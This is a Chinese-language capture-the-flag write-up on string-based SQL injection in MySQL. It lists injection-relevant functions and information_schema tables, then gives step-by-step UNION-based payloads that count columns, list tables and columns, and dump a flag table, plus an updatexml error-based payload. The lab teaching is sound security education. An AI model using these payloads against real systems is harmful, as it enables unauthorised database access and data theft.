字符型注入:
需要了解mysql的知识点:
union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符
和一些基本sql语法
和一些基本注释:
#,–空格,/* */
首先开启题目,知道这一题字符型注入,
所以存在引号,
于是利用引号和注释:
1’
1’ and 1=1#
1 and 1=2#
去测试是否有sql漏洞
得到:
发现1’ 报错
和 1 and 1=1,回显
而1 and 1=2,没有回显
得出结论,执行了逻辑语句and ,所以有sql漏洞
所以构造语句,查看字段:
1’ order by 1#
1’ order by 2#
1’ order by 3#
可以看到3没有回显,所以只有两个字段
于是构造语句:
520’ union select 1,2#
发现有两个字段可以执行,于是构造语句
查看当前数据库:
520’ union select 1,database()#
在查看数据库内容:
520’ union select 1,group_concat(table_name) from
information_schema.tables where table_schema=‘sqli’ limit 1#
得到表flag ,查看表flag的字段:
520’ union select 1,group_concat(column_name) from
information_schema.columns where table_schema=‘sqli’
and table_name=‘flag’ limit 1#
得到字段,于是查看字段内容:
520’ union select 1,group_concat(flag) from sqli.flag limit 1#
得到flag